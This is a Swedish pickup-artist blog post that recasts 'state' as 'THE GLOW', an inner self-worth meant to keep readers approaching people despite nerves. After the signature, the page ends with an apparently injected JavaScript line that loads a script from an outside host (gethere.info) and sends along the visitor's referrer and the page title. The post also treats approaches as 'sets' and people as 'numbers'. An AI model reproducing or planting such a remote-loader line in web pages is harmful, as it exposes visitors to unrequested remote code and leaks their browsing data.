Okej efter mycket påtryckningar från Theman så skall jag delge min syn på THE GLOW, mer känd för andra utanför C-R crew som STATE. Min syn på PU handlar om att sätta sin personlighet på spel. Det finns inga perfekta lines, inga lätta set och inga genvägar. ”When the shit hits the fan” så finns det inget återvändo. Nervositet spelar in, man glömmer bort sina lines, kanske är allmänt trött… När du väl approachar så kan vad som helst hända, ”you are landing under fire”, och det är den nakna sanningen – punkt slut!

Så är det för mig och många av mina kära vänner. Så hur hanterar vi det? Du kan skylla på ovanstående saker hit och dit och flöjta till höger och vänster, ”Jag är i dålig state…yada yada..”. Sanningen är att om du börjar grotta ner dig i såna tankar så kommer du att försätta dig själv i ett stadie som många gånger liknar självdepression… Detta händer alldeles för ofta. Det inte bara destruktivt tänkande men även ”valuetaking” mot alla omkring dig. Tillåt dig själv att skilja dig från det tankesättet en gång för alla, för i slutet av dagen så är det bara ytterligare en ursäkt. Du vet det själv.

Det mest effektiva sättet att motverka detta är att ta bort det ur din vokabulär helt och hållet. Jag vill aldrig mer höra någon säga ordet STATE! Sluta nämna djävulen och projicera THE GLOW istället! Några kallar det självkänsla vi kallar det THE GLOW. THE GLOW är den lilla rösten som hjälper dig i svåra stunder. Som strider konstant mot dina tvångstankar om otillräcklighet. Han/hon som säger att du duger för den du är. Att du kan klara det du vill, det är THE GLOW! Allt annat är känslor personifierade i ett ord som STATE… Hur många gånger har du inte hört någon polare säga, ”jag är i dåligt state ikväll” eller ”jag är inte på partyhumör idag”? Fuck that! Bestäm dig nu. Min GLOW är starkare än min mentala sjävbestraffning av att jag inte duger.

Tänk efter hur många gånger THE GLOW har hjälp dig. Att du överhuvudtaget börjat förändra ditt liv visar att du har den. Det fina med THE GLOW är att den finns alltid där inom dig, oavsett yttre eller inre omständigheter. Den blir bara starkare och går inte att skruva ner. Det är en självbevarelsemekanism som kommer vara dig ständigt trogen för resten av ditt liv. Du kan var trött, low energi och leva i allmänt kaos – du kan fortfarande presestera. Mina bästa sets kommer just när jag som ”sämst”. Den ena har inget med andra och göra. Även historisk så har stora genombrott skett under tuffa konditioner. Om andra kan så varför kan inte du.. One last set. Det är allt du behöver tänka, så lägg ner din mentala självbestraffing och släpp ut THE GLOW.

Somliga säger att man ska spela för att vinna? Men vad innebär det egentligen? Att du sätter 10 av 10 skott eller att du fortsätter kämpa ”for the love of the GAME”? Du ler och har kul under resan väg, likaså när du lyckats med att uppnå det du drömt om. Det är skillnaden. Testa att bränna dina broar och jobba in dig i nästa set istället för att gå för ett enkelt nummer med 99% flakechans endast i syfte att stilla ditt ego. Gör det svårt för dig själv och utmana dig genom att stå i nya perspektiv jag lovar att du kommer att vara stoltare efteråt. För utmaningens skull mer än för själva resultatet, resultaten följer med tiden.

Här följer en skön analogi från filmen ”The Last Dragon”. I korta drag så handlar detta mästerverk om att hitta THE GLOW. Enligt legenden så kommer din kropp att glöda när du väl finner den. Bra tekniker ger dig hjälp på vägen och du kommer glöda kring händer och armar. Men när du väl förstått att du duger precis som du är, samtidigt som kryddar med tekniker så når du sista nivån av att bli THE MASTER.Find your inner awesomeness and project it outwards – project THE GLOW!

Love,
SUPERMAN

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;